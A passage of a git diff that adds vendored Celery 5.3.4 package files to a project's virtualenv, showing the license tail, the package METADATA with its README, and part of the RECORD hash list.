CONTRIBUTORS +BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +POSSIBILITY OF SUCH DAMAGE. + +Documentation License +===================== + +The documentation portion of Celery (the rendered contents of the +"docs" directory of a software distribution or checkout) is supplied +under the "Creative Commons Attribution-ShareAlike 4.0 +International" (CC BY-SA 4.0) License as described by +https://creativecommons.org/licenses/by-sa/4.0/ + +Footnotes +========= +(1) A GPL-compatible license makes it possible to + combine Celery with other software that is released + under the GPL, it does not mean that we're distributing + Celery under the GPL license. The BSD license, unlike the GPL, + let you distribute a modified version without making your + changes open source. diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/METADATA b/env/Lib/site-packages/celery-5.3.4.dist-info/METADATA new file mode 100644 index 00000000..cab80e62 --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/METADATA @@ -0,0 +1,655 @@ +Metadata-Version: 2.1 +Name: celery +Version: 5.3.4 +Summary: Distributed Task Queue. +Home-page: https://docs.celeryq.dev/ +Author: Ask Solem +Author-email: auvipy@gmail.com +License: BSD-3-Clause +Project-URL: Documentation, https://docs.celeryq.dev/en/stable/ +Project-URL: Changelog, https://docs.celeryq.dev/en/stable/changelog.html +Project-URL: Code, https://github.com/celery/celery +Project-URL: Tracker, https://github.com/celery/celery/issues +Project-URL: Funding, https://opencollective.com/celery +Keywords: task job queue distributed messaging actor +Platform: any +Classifier: Development Status :: 5 - Production/Stable +Classifier: License :: OSI Approved :: BSD License +Classifier: Topic :: System :: Distributed Computing +Classifier: Topic :: Software Development :: Object Brokering +Classifier: Framework :: Celery +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Operating System :: OS Independent +Requires-Python: >=3.8 +License-File: LICENSE +Requires-Dist: billiard (<5.0,>=4.1.0) +Requires-Dist: kombu (<6.0,>=5.3.2) +Requires-Dist: vine (<6.0,>=5.0.0) +Requires-Dist: click (<9.0,>=8.1.2) +Requires-Dist: click-didyoumean (>=0.3.0) +Requires-Dist: click-repl (>=0.2.0) +Requires-Dist: click-plugins (>=1.1.1) +Requires-Dist: tzdata (>=2022.7) +Requires-Dist: python-dateutil (>=2.8.2) +Requires-Dist: importlib-metadata (>=3.6) ; python_version < "3.8" +Requires-Dist: backports.zoneinfo (>=0.2.1) ; python_version < "3.9" +Provides-Extra: arangodb +Requires-Dist: pyArango (>=2.0.2) ; extra == 'arangodb' +Provides-Extra: auth +Requires-Dist: cryptography (==41.0.3) ; extra == 'auth' +Provides-Extra: azureblockblob +Requires-Dist: azure-storage-blob (>=12.15.0) ; extra == 'azureblockblob' +Provides-Extra: brotli +Requires-Dist: brotli (>=1.0.0) ; (platform_python_implementation == "CPython") and extra == 'brotli' +Requires-Dist: brotlipy (>=0.7.0) ; (platform_python_implementation == "PyPy") and extra == 'brotli' +Provides-Extra: cassandra +Requires-Dist: cassandra-driver (<4,>=3.25.0) ; extra == 'cassandra' +Provides-Extra: consul +Requires-Dist: python-consul2 (==0.1.5) ; extra == 'consul' +Provides-Extra: cosmosdbsql +Requires-Dist: pydocumentdb (==2.3.5) ; extra == 'cosmosdbsql' +Provides-Extra: couchbase +Requires-Dist: couchbase (>=3.0.0) ; (platform_python_implementation != "PyPy" and (platform_system != "Windows" or python_version < "3.10")) and extra == 'couchbase' +Provides-Extra: couchdb +Requires-Dist: pycouchdb (==1.14.2) ; extra == 'couchdb' +Provides-Extra: django +Requires-Dist: Django (>=2.2.28) ; extra == 'django' +Provides-Extra: dynamodb +Requires-Dist: boto3 (>=1.26.143) ; extra == 'dynamodb' +Provides-Extra: elasticsearch +Requires-Dist: elasticsearch (<8.0) ; extra == 'elasticsearch' +Provides-Extra: eventlet +Requires-Dist: eventlet (>=0.32.0) ; (python_version < "3.10") and extra == 'eventlet' +Provides-Extra: gevent +Requires-Dist: gevent (>=1.5.0) ; extra == 'gevent' +Provides-Extra: librabbitmq +Requires-Dist: librabbitmq (>=2.0.0) ; (python_version < "3.11") and extra == 'librabbitmq' +Provides-Extra: memcache +Requires-Dist: pylibmc (==1.6.3) ; (platform_system != "Windows") and extra == 'memcache' +Provides-Extra: mongodb +Requires-Dist: pymongo[srv] (>=4.0.2) ; extra == 'mongodb' +Provides-Extra: msgpack +Requires-Dist: msgpack (==1.0.5) ; extra == 'msgpack' +Provides-Extra: pymemcache +Requires-Dist: python-memcached (==1.59) ; extra == 'pymemcache' +Provides-Extra: pyro +Requires-Dist: pyro4 (==4.82) ; (python_version < "3.11") and extra == 'pyro' +Provides-Extra: pytest +Requires-Dist: pytest-celery (==0.0.0) ; extra == 'pytest' +Provides-Extra: redis +Requires-Dist: redis (!=4.5.5,<5.0.0,>=4.5.2) ; extra == 'redis' +Provides-Extra: s3 +Requires-Dist: boto3 (>=1.26.143) ; extra == 's3' +Provides-Extra: slmq +Requires-Dist: softlayer-messaging (>=1.0.3) ; extra == 'slmq' +Provides-Extra: solar +Requires-Dist: ephem (==4.1.4) ; (platform_python_implementation != "PyPy") and extra == 'solar' +Provides-Extra: sqlalchemy +Requires-Dist: sqlalchemy (<2.1,>=1.4.48) ; extra == 'sqlalchemy' +Provides-Extra: sqs +Requires-Dist: boto3 (>=1.26.143) ; extra == 'sqs' +Requires-Dist: urllib3 (>=1.26.16) ; extra == 'sqs' +Requires-Dist: kombu[sqs] (>=5.3.0) ; extra == 'sqs' +Requires-Dist: pycurl (>=7.43.0.5) ; (sys_platform != "win32" and platform_python_implementation == "CPython") and extra == 'sqs' +Provides-Extra: tblib +Requires-Dist: tblib (>=1.3.0) ; (python_version < "3.8.0") and extra == 'tblib' +Requires-Dist: tblib (>=1.5.0) ; (python_version >= "3.8.0") and extra == 'tblib' +Provides-Extra: yaml +Requires-Dist: PyYAML (>=3.10) ; extra == 'yaml' +Provides-Extra: zookeeper +Requires-Dist: kazoo (>=1.3.1) ; extra == 'zookeeper' +Provides-Extra: zstd +Requires-Dist: zstandard (==0.21.0) ; extra == 'zstd' + +.. image:: https://docs.celeryq.dev/en/latest/_images/celery-banner-small.png + +|build-status| |coverage| |license| |wheel| |semgrep| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge| + +:Version: 5.3.4 (emerald-rush) +:Web: https://docs.celeryq.dev/en/stable/index.html +:Download: https://pypi.org/project/celery/ +:Source: https://github.com/celery/celery/ +:Keywords: task, queue, job, async, rabbitmq, amqp, redis, + python, distributed, actors + +Donations +========= + +This project relies on your generous donations. + +If you are using Celery to create a commercial product, please consider becoming our `backer`_ or our `sponsor`_ to ensure Celery's future. + +.. _`backer`: https://opencollective.com/celery#backer +.. _`sponsor`: https://opencollective.com/celery#sponsor + +For enterprise +============== + +Available as part of the Tidelift Subscription. + +The maintainers of ``celery`` and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. `Learn more. `_ + +What's a Task Queue? +==================== + +Task queues are used as a mechanism to distribute work across threads or +machines. + +A task queue's input is a unit of work, called a task, dedicated worker +processes then constantly monitor the queue for new work to perform. + +Celery communicates via messages, usually using a broker +to mediate between clients and workers. To initiate a task a client puts a +message on the queue, the broker then delivers the message to a worker. + +A Celery system can consist of multiple workers and brokers, giving way +to high availability and horizontal scaling. + +Celery is written in Python, but the protocol can be implemented in any +language. In addition to Python there's node-celery_ for Node.js, +a `PHP client`_, `gocelery`_, gopher-celery_ for Go, and rusty-celery_ for Rust. + +Language interoperability can also be achieved by using webhooks +in such a way that the client enqueues an URL to be requested by a worker. + +.. _node-celery: https://github.com/mher/node-celery +.. _`PHP client`: https://github.com/gjedeer/celery-php +.. _`gocelery`: https://github.com/gocelery/gocelery +.. _gopher-celery: https://github.com/marselester/gopher-celery +.. _rusty-celery: https://github.com/rusty-celery/rusty-celery + +What do I need? +=============== + +Celery version 5.3.4 runs on: + +- Python (3.8, 3.9, 3.10, 3.11) +- PyPy3.8+ (v7.3.11+) + + +This is the version of celery which will support Python 3.8 or newer. + +If you're running an older version of Python, you need to be running +an older version of Celery: + +- Python 3.7: Celery 5.2 or earlier. +- Python 3.6: Celery 5.1 or earlier. +- Python 2.7: Celery 4.x series. +- Python 2.6: Celery series 3.1 or earlier. +- Python 2.5: Celery series 3.0 or earlier. +- Python 2.4: Celery series 2.2 or earlier. + +Celery is a project with minimal funding, +so we don't support Microsoft Windows but it should be working. +Please don't open any issues related to that platform. + +*Celery* is usually used with a message broker to send and receive messages. +The RabbitMQ, Redis transports are feature complete, +but there's also experimental support for a myriad of other solutions, including +using SQLite for local development. + +*Celery* can run on a single machine, on multiple machines, or even +across datacenters. + +Get Started +=========== + +If this is the first time you're trying to use Celery, or you're +new to Celery v5.3.4 coming from previous versions then you should read our +getting started tutorials: + +- `First steps with Celery`_ + + Tutorial teaching you the bare minimum needed to get started with Celery. + +- `Next steps`_ + + A more complete overview, showing more features. + +.. _`First steps with Celery`: + https://docs.celeryq.dev/en/stable/getting-started/first-steps-with-celery.html + +.. _`Next steps`: + https://docs.celeryq.dev/en/stable/getting-started/next-steps.html + + You can also get started with Celery by using a hosted broker transport CloudAMQP. The largest hosting provider of RabbitMQ is a proud sponsor of Celery. + +Celery is... +============= + +- **Simple** + + Celery is easy to use and maintain, and does *not need configuration files*. + + It has an active, friendly community you can talk to for support, + like at our `mailing-list`_, or the IRC channel. + + Here's one of the simplest applications you can make: + + .. code-block:: python + + from celery import Celery + + app = Celery('hello', broker='amqp://guest@localhost//') + + @app.task + def hello(): + return 'hello world' + +- **Highly Available** + + Workers and clients will automatically retry in the event + of connection loss or failure, and some brokers support + HA in way of *Primary/Primary* or *Primary/Replica* replication. + +- **Fast** + + A single Celery process can process millions of tasks a minute, + with sub-millisecond round-trip latency (using RabbitMQ, + py-librabbitmq, and optimized settings). + +- **Flexible** + + Almost every part of *Celery* can be extended or used on its own, + Custom pool implementations, serializers, compression schemes, logging, + schedulers, consumers, producers, broker transports, and much more. + +It supports... +================ + + - **Message Transports** + + - RabbitMQ_, Redis_, Amazon SQS + + - **Concurrency** + + - Prefork, Eventlet_, gevent_, single threaded (``solo``) + + - **Result Stores** + + - AMQP, Redis + - memcached + - SQLAlchemy, Django ORM + - Apache Cassandra, IronCache, Elasticsearch + + - **Serialization** + + - *pickle*, *json*, *yaml*, *msgpack*. + - *zlib*, *bzip2* compression. + - Cryptographic message signing. + +.. _`Eventlet`: http://eventlet.net/ +.. _`gevent`: http://gevent.org/ + +.. _RabbitMQ: https://rabbitmq.com +.. _Redis: https://redis.io +.. _SQLAlchemy: http://sqlalchemy.org + +Framework Integration +===================== + +Celery is easy to integrate with web frameworks, some of which even have +integration packages: + + +--------------------+------------------------+ + | `Django`_ | not needed | + +--------------------+------------------------+ + | `Pyramid`_ | `pyramid_celery`_ | + +--------------------+------------------------+ + | `Pylons`_ | `celery-pylons`_ | + +--------------------+------------------------+ + | `Flask`_ | not needed | + +--------------------+------------------------+ + | `web2py`_ | `web2py-celery`_ | + +--------------------+------------------------+ + | `Tornado`_ | `tornado-celery`_ | + +--------------------+------------------------+ + +The integration packages aren't strictly necessary, but they can make +development easier, and sometimes they add important hooks like closing +database connections at ``fork``. + +.. _`Django`: https://djangoproject.com/ +.. _`Pylons`: http://pylonsproject.org/ +.. _`Flask`: https://flask.palletsprojects.com/ +.. _`web2py`: http://web2py.com/ +.. _`Bottle`: https://bottlepy.org/ +.. _`Pyramid`: https://docs.pylonsproject.org/projects/pyramid/en/latest/ +.. _`pyramid_celery`: https://pypi.org/project/pyramid_celery/ +.. _`celery-pylons`: https://pypi.org/project/celery-pylons/ +.. _`web2py-celery`: https://code.google.com/p/web2py-celery/ +.. _`Tornado`: https://www.tornadoweb.org/ +.. _`tornado-celery`: https://github.com/mher/tornado-celery/ + +.. _celery-documentation: + +Documentation +============= + +The `latest documentation`_ is hosted at Read The Docs, containing user guides, +tutorials, and an API reference. + +最新的中文文档托管在 https://www.celerycn.io/ 中,包含用户指南、教程、API接口等。 + +.. _`latest documentation`: https://docs.celeryq.dev/en/latest/ + +.. _celery-installation: + +Installation +============ + +You can install Celery either via the Python Package Index (PyPI) +or from source. + +To install using ``pip``: + +:: + + + $ pip install -U Celery + +.. _bundles: + +Bundles +------- + +Celery also defines a group of bundles that can be used +to install Celery and the dependencies for a given feature. + +You can specify these in your requirements or on the ``pip`` +command-line by using brackets. Multiple bundles can be specified by +separating them by commas. + +:: + + + $ pip install "celery[redis]" + + $ pip install "celery[redis,auth,msgpack]" + +The following bundles are available: + +Serializers +~~~~~~~~~~~ + +:``celery[auth]``: + for using the ``auth`` security serializer. + +:``celery[msgpack]``: + for using the msgpack serializer. + +:``celery[yaml]``: + for using the yaml serializer. + +Concurrency +~~~~~~~~~~~ + +:``celery[eventlet]``: + for using the ``eventlet`` pool. + +:``celery[gevent]``: + for using the ``gevent`` pool. + +Transports and Backends +~~~~~~~~~~~~~~~~~~~~~~~ + +:``celery[amqp]``: + for using the RabbitMQ amqp python library. + +:``celery[redis]``: + for using Redis as a message transport or as a result backend. + +:``celery[sqs]``: + for using Amazon SQS as a message transport. + +:``celery[tblib``]: + for using the ``task_remote_tracebacks`` feature. + +:``celery[memcache]``: + for using Memcached as a result backend (using ``pylibmc``) + +:``celery[pymemcache]``: + for using Memcached as a result backend (pure-Python implementation). + +:``celery[cassandra]``: + for using Apache Cassandra/Astra DB as a result backend with the DataStax driver. + +:``celery[azureblockblob]``: + for using Azure Storage as a result backend (using ``azure-storage``) + +:``celery[s3]``: + for using S3 Storage as a result backend. + +:``celery[couchbase]``: + for using Couchbase as a result backend. + +:``celery[arangodb]``: + for using ArangoDB as a result backend. + +:``celery[elasticsearch]``: + for using Elasticsearch as a result backend. + +:``celery[riak]``: + for using Riak as a result backend. + +:``celery[cosmosdbsql]``: + for using Azure Cosmos DB as a result backend (using ``pydocumentdb``) + +:``celery[zookeeper]``: + for using Zookeeper as a message transport. + +:``celery[sqlalchemy]``: + for using SQLAlchemy as a result backend (*supported*). + +:``celery[pyro]``: + for using the Pyro4 message transport (*experimental*). + +:``celery[slmq]``: + for using the SoftLayer Message Queue transport (*experimental*). + +:``celery[consul]``: + for using the Consul.io Key/Value store as a message transport or result backend (*experimental*). + +:``celery[django]``: + specifies the lowest version possible for Django support. + + You should probably not use this in your requirements, it's here + for informational purposes only. + + +.. _celery-installing-from-source: + +Downloading and installing from source +-------------------------------------- + +Download the latest version of Celery from PyPI: + +https://pypi.org/project/celery/ + +You can install it by doing the following: + +:: + + + $ tar xvfz celery-0.0.0.tar.gz + $ cd celery-0.0.0 + $ python setup.py build + # python setup.py install + +The last command must be executed as a privileged user if +you aren't currently using a virtualenv. + +.. _celery-installing-from-git: + +Using the development version +----------------------------- + +With pip +~~~~~~~~ + +The Celery development version also requires the development +versions of ``kombu``, ``amqp``, ``billiard``, and ``vine``. + +You can install the latest snapshot of these using the following +pip commands: + +:: + + + $ pip install https://github.com/celery/celery/zipball/main#egg=celery + $ pip install https://github.com/celery/billiard/zipball/main#egg=billiard + $ pip install https://github.com/celery/py-amqp/zipball/main#egg=amqp + $ pip install https://github.com/celery/kombu/zipball/main#egg=kombu + $ pip install https://github.com/celery/vine/zipball/main#egg=vine + +With git +~~~~~~~~ + +Please see the Contributing section. + +.. _getting-help: + +Getting Help +============ + +.. _mailing-list: + +Mailing list +------------ + +For discussions about the usage, development, and future of Celery, +please join the `celery-users`_ mailing list. + +.. _`celery-users`: https://groups.google.com/group/celery-users/ + +.. _irc-channel: + +IRC +--- + +Come chat with us on IRC. The **#celery** channel is located at the +`Libera Chat`_ network. + +.. _`Libera Chat`: https://libera.chat/ + +.. _bug-tracker: + +Bug tracker +=========== + +If you have any suggestions, bug reports, or annoyances please report them +to our issue tracker at https://github.com/celery/celery/issues/ + +.. _wiki: + +Wiki +==== + +https://github.com/celery/celery/wiki + +Credits +======= + +.. _contributing-short: + +Contributors +------------ + +This project exists thanks to all the people who contribute. Development of +`celery` happens at GitHub: https://github.com/celery/celery + +You're highly encouraged to participate in the development +of `celery`. If you don't like GitHub (for some reason) you're welcome +to send regular patches. + +Be sure to also read the `Contributing to Celery`_ section in the +documentation. + +.. _`Contributing to Celery`: + https://docs.celeryq.dev/en/stable/contributing.html + +|oc-contributors| + +.. |oc-contributors| image:: https://opencollective.com/celery/contributors.svg?width=890&button=false + :target: https://github.com/celery/celery/graphs/contributors + +Backers +------- + +Thank you to all our backers! 🙏 [`Become a backer`_] + +.. _`Become a backer`: https://opencollective.com/celery#backer + +|oc-backers| + +.. |oc-backers| image:: https://opencollective.com/celery/backers.svg?width=890 + :target: https://opencollective.com/celery#backers + +Sponsors +-------- + +Support this project by becoming a sponsor. Your logo will show up here with a +link to your website. [`Become a sponsor`_] + +.. _`Become a sponsor`: https://opencollective.com/celery#sponsor + +|oc-sponsors| + +.. |oc-sponsors| image:: https://opencollective.com/celery/sponsor/0/avatar.svg + :target: https://opencollective.com/celery/sponsor/0/website + +.. _license: + +License +======= + +This software is licensed under the `New BSD License`. See the ``LICENSE`` +file in the top distribution directory for the full license text. + +.. # vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround + +.. |build-status| image:: https://github.com/celery/celery/actions/workflows/python-package.yml/badge.svg + :alt: Build status + :target: https://github.com/celery/celery/actions/workflows/python-package.yml + +.. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=main + :target: https://codecov.io/github/celery/celery?branch=main + +.. |license| image:: https://img.shields.io/pypi/l/celery.svg + :alt: BSD License + :target: https://opensource.org/licenses/BSD-3-Clause + +.. |wheel| image:: https://img.shields.io/pypi/wheel/celery.svg + :alt: Celery can be installed via wheel + :target: https://pypi.org/project/celery/ + +.. |semgrep| image:: https://img.shields.io/badge/semgrep-security-green.svg + :alt: Semgrep security + :target: https://go.semgrep.dev/home + +.. |pyversion| image:: https://img.shields.io/pypi/pyversions/celery.svg + :alt: Supported Python versions. + :target: https://pypi.org/project/celery/ + +.. |pyimp| image:: https://img.shields.io/pypi/implementation/celery.svg + :alt: Supported Python implementations. + :target: https://pypi.org/project/celery/ + +.. |ocbackerbadge| image:: https://opencollective.com/celery/backers/badge.svg + :alt: Backers on Open Collective + :target: #backers + +.. |ocsponsorbadge| image:: https://opencollective.com/celery/sponsors/badge.svg + :alt: Sponsors on Open Collective + :target: #sponsors + +.. |downloads| image:: https://pepy.tech/badge/celery + :alt: Downloads + :target: https://pepy.tech/project/celery diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/RECORD b/env/Lib/site-packages/celery-5.3.4.dist-info/RECORD new file mode 100644 index 00000000..5364b31c --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/RECORD @@ -0,0 +1,320 @@ +../../Scripts/celery.exe,sha256=uzbyQjFBXPGLYLvfUPTpg2LgHRnnAjoKN8BTF57IaeQ,97167 +celery-5.3.4.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +celery-5.3.4.dist-info/LICENSE,sha256=w1jN938ou6tQ1KdU4SMRgznBUjA0noK_Zkic7OOsCTo,2717 +celery-5.3.4.dist-info/METADATA,sha256=VwAVQZ0Kl2NxLaXXqYf8PcnptX9fakvtAmI2xHeTqdo,21051 +celery-5.3.4.dist-info/RECORD,, +celery-5.3.4.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +celery-5.3.4.dist-info/WHEEL,sha256=pkctZYzUS4AYVn6dJ-7367OJZivF2e8RA9b_ZBjif18,92 +celery-5.3.4.dist-info/entry_points.txt,sha256=FkfFPVffdhqvYOPHkpE85ki09ni0e906oNdWLdN7z_Q,48 +celery-5.3.4.dist-info/top_level.txt,sha256=sQQ-a5HNsZIi2A8DiKQnB1HODFMfmrzIAZIE8t_XiOA,7 +celery/__init__.py,sha256=N18V32hIC7cyR2Wp-uucng-ZXRTBlbBqrANrslxVudE,5949 +celery/__main__.py,sha256=0iT3WCc80mA88XhdAxTpt_g6TFRgmwHSc9GG-HiPzkE,409 +celery/__pycache__/__init__.cpython-310.pyc,, +celery/__pycache__/__main__.cpython-310.pyc,, +celery/__pycache__/_state.cpython-310.pyc,, +celery/__pycache__/beat.cpython-310.pyc,, +celery/__pycache__/bootsteps.cpython-310.pyc,, +celery/__pycache__/canvas.cpython-310.pyc,, +celery/__pycache__/exceptions.cpython-310.pyc,, +celery/__pycache__/local.cpython-310.pyc,, +celery/__pycache__/platforms.cpython-310.pyc,, +celery/__pycache__/result.cpython-310.pyc,, +celery/__pycache__/schedules.cpython-310.pyc,, +celery/__pycache__/signals.cpython-310.pyc,, +celery/__pycache__/states.cpython-310.pyc,, +celery/_state.py,sha256=k7T9CzeYR5PZSr0MjSVvFs6zpfkZal9Brl8xu-vPpXk,5029 +celery/app/__init__.py,sha256=a6zj_J9SaawrlJu3rvwCVY8j7_bIGCzPn7ZH5iUlqNE,2430 +celery/app/__pycache__/__init__.cpython-310.pyc,, +celery/app/__pycache__/amqp.cpython-310.pyc,, +celery/app/__pycache__/annotations.cpython-310.pyc,, +celery/app/__pycache__/autoretry.cpython-310.pyc,, +celery/app/__pycache__/backends.cpython-310.pyc,, +celery/app/__pycache__/base.cpython-310.pyc,, +celery/app/__pycache__/builtins.cpython-310.pyc,, +celery/app/__pycache__/control.cpython-310.pyc,, +celery/app/__pycache__/defaults.cpython-310.pyc,, +celery/app/__pycache__/events.cpython-310.pyc,, +celery/app/__pycache__/log.cpython-310.pyc,, +celery/app/__pycache__/registry.cpython-310.pyc,, +celery/app/__pycache__/routes.cpython-310.pyc,, +celery/app/__pycache__/task.cpython-310.pyc,, +celery/app/__pycache__/trace.cpython-310.pyc,, +celery/app/__pycache__/utils.cpython-310.pyc,, +celery/app/amqp.py,sha256=SWV-lr5zv1PJjGMyWQZlbJ0ToaQrzfIpZdOYEaGWgqs,23151 +celery/app/annotations.py,sha256=93zuKNCE7pcMD3K5tM5HMeVCQ5lfJR_0htFpottgOeU,1445 +celery/app/autoretry.py,sha256=PfSi8sb77jJ57ler-Y5ffdqDWvHMKFgQ_bpVD5937tc,2506 +celery/app/backends.py,sha256=__GqdylFJSa9G_JDSdXdsygfe7FjK7fgn4fZgetdUMw,2702 +celery/app/base.py,sha256=o68aTkvYf8JoYQWl7j3vtXAP5CiPK4Iwh-5MKgVXRmo,50088 +celery/app/builtins.py,sha256=gnOyE07M8zgxatTmb0D0vKztx1sQZaRi_hO_d-FLNUs,6673 +celery/app/control.py,sha256=La-b_hQGnyWxoM5PIMr-aIzeyasRKkfNJXRvznMHjjk,29170 +celery/app/defaults.py,sha256=XzImSLArwDREJWJbgt1bDz-Cgdxtq9cBfSixa85IQ0Y,15014 +celery/app/events.py,sha256=9ZyjdhUVvrt6xLdOMOVTPN7gjydLWQGNr4hvFoProuA,1326 +celery/app/log.py,sha256=uAlmoLQH347P1WroX13J2XolenmcyBIi2a-aD6kMnZk,9067 +celery/app/registry.py,sha256=imdGUFb9CS4iiZ1pxAwcQAbe1JKKjyv9WTy94qHHQvk,2001 +celery/app/routes.py,sha256=DMdr5nmEnqJWXkLFIzWWxM2sz9ZYeA--8FeSaxKcBCg,4527 +celery/app/task.py,sha256=4bknTqa3yZ_0VFVb_aX9glA3YwCmpAP1KzCOV2x7p6A,43278 +celery/app/trace.py,sha256=cblXI8oJIU_CmJYvvES6BzcRsW9t6NguQuzDmOzdKWY,28434 +celery/app/utils.py,sha256=52e5u-PUJbwEHtNr_XdpJNnuHdC9c2q6FPkiBu_1SmY,13160 +celery/apps/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +celery/apps/__pycache__/__init__.cpython-310.pyc,, +celery/apps/__pycache__/beat.cpython-310.pyc,, +celery/apps/__pycache__/multi.cpython-310.pyc,, +celery/apps/__pycache__/worker.cpython-310.pyc,, +celery/apps/beat.py,sha256=BX7NfHO_BYy9OuVTcSnyrOTVS1eshFctHDpYGfgKT5A,5724 +celery/apps/multi.py,sha256=1pujkm0isInjAR9IHno5JucuWcwZAJ1mtqJU1DVkJQo,16360 +celery/apps/worker.py,sha256=B1_uXLtclcrQAVHupd9B8pXubk4TCOIytGbWIsEioeQ,13208 +celery/backends/__init__.py,sha256=1kN92df1jDp3gC6mrGEZI2eE-kOEUIKdOOHRAdry2a0,23 +celery/backends/__pycache__/__init__.cpython-310.pyc,, +celery/backends/__pycache__/arangodb.cpython-310.pyc,, +celery/backends/__pycache__/asynchronous.cpython-310.pyc,, +celery/backends/__pycache__/azureblockblob.cpython-310.pyc,, +celery/backends/__pycache__/base.cpython-310.pyc,, +celery/backends/__pycache__/cache.cpython-310.pyc,, +celery/backends/__pycache__/cassandra.cpython-310.pyc,, +celery/backends/__pycache__/consul.cpython-310.pyc,, +celery/backends/__pycache__/cosmosdbsql.cpython-310.pyc,, +celery/backends/__pycache__/couchbase.cpython-310.pyc,, +celery/backends/__pycache__/couchdb.cpython-310.pyc,, +celery/backends/__pycache__/dynamodb.cpython-310.pyc,, +celery/backends/__pycache__/elasticsearch.cpython-310.pyc,, +celery/backends/__pycache__/filesystem.cpython-310.pyc,, +celery/backends/__pycache__/mongodb.cpython-310.pyc,, +celery/backends/__pycache__/redis.cpython-310.pyc,, +celery/backends/__pycache__/rpc.cpython-310.pyc,, +celery/backends/__pycache__/s3.cpython-310.pyc,, +celery/backends/arangodb.py,sha256=aMwuBglVJxigWN8L9NWh-q2NjPQegw__xgRcTMLf5eU,5937 +celery/backends/asynchronous.py,sha256=1_tCrURDVg0FvZhRzlRGYwTmsdWK14nBzvPulhwJeR4,10309 +celery/backends/azureblockblob.py,sha256=7jbjTmChq_uJlvzg06dp9q9-sMHKuS0Z3LyjXjgycdk,5127 +celery/backends/base.py,sha256=A4rgCmGvCjlLqfJGuQydE4Dft9WGUfKTqa79FAIUAsk,43970 +celery/backends/cache.py,sha256=_o9EBmBByNsbI_UF-PJ5W0u-qwcJ37Q5jaIrApPO4q8,4831 +celery/backends/cassandra.py,sha256=xB5z3JtNqmnaQY8bjst-PR1dnNgZrX8lKwEQpYiRhv8,9006 +celery/backends/consul.py,sha256=oAB_94ftS95mjycQ4YL4zIdA-tGmwFyq3B0OreyBPNQ,3816 +celery/backends/cosmosdbsql.py,sha256=XdCVCjxO71XhsgiM9DueJngmKx_tE0erexHf37-JhqE,6777 +celery/backends/couchbase.py,sha256=fyyihfJNW6hWgVlHKuTCHkzWlDjkzWQAWhgW3GJzAds,3393 +celery/backends/couchdb.py,sha256=M_z0zgNFPwFw89paa5kIQ9x9o7VRPwuKCLZgoFhFDpA,2935 +celery/backends/database/__init__.py,sha256=GMBZQy0B1igxHOXP-YoYKkr0FOuxAwesYi6MFz8wRdQ,7751 +celery/backends/database/__pycache__/__init__.cpython-310.pyc,, +celery/backends/database/__pycache__/models.cpython-310.pyc,, +celery/backends/database/__pycache__/session.cpython-310.pyc,, +celery/backends/database/models.py,sha256=_6WZMv53x8I1iBRCa4hY35LaBUeLIZJzDusjvS-8aAg,3351 +celery/backends/database/session.py,sha256=3zu7XwYoE52aS6dsSmJanqlvS6ssjet7hSNUbliwnLo,3011 +celery/backends/dynamodb.py,sha256=sEb4TOcrEFOvFU19zRSmXZ-taNDJgbb0_R-4KpNRgcg,17179 +celery/backends/elasticsearch.py,sha256=nseWGjMB49OkHn4LbZLjlo2GLSoHCZOFObklrFsWNW4,8319 +celery/backends/filesystem.py,sha256=Q-8RCPG7TaDVJEOnwMfS8Ggygc8BYcKuBljwzwOegec,3776 +celery/backends/mongodb.py,sha256=XIL1oYEao-YpbmE0CB_sGYP_FJnSP8_CZNouBicxcrg,11419 +celery/backends/redis.py,sha256=wnl45aMLf4SSmX2JDEiFIlnNaKY3I6PBjJeL7adEuCA,26389 +celery/backends/rpc.py,sha256=Pfzjpz7znOfmHRERuQfOlTW-entAsl803oc1-EWpnTY,12077 +celery/backends/s3.py,sha256=MUL4-bEHCcTL53XXyb020zyLYTr44DDjOh6BXtkp9lQ,2752 +celery/beat.py,sha256=j_ZEA73B7NWvlGVbXVcLeOq_tFk0JNT4HiAVdvH7HG4,24455 +celery/bin/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +celery/bin/__pycache__/__init__.cpython-310.pyc,, +celery/bin/__pycache__/amqp.cpython-310.pyc,, +celery/bin/__pycache__/base.cpython-310.pyc,, +celery/bin/__pycache__/beat.cpython-310.pyc,, +celery/bin/__pycache__/call.cpython-310.pyc,, +celery/bin/__pycache__/celery.cpython-310.pyc,, +celery/bin/__pycache__/control.cpython-310.pyc,, +celery/bin/__pycache__/events.cpython-310.pyc,, +celery/bin/__pycache__/graph.cpython-310.pyc,, +celery/bin/__pycache__/list.cpython-310.pyc,, +celery/bin/__pycache__/logtool.cpython-310.pyc,, +celery/bin/__pycache__/migrate.cpython-310.pyc,, 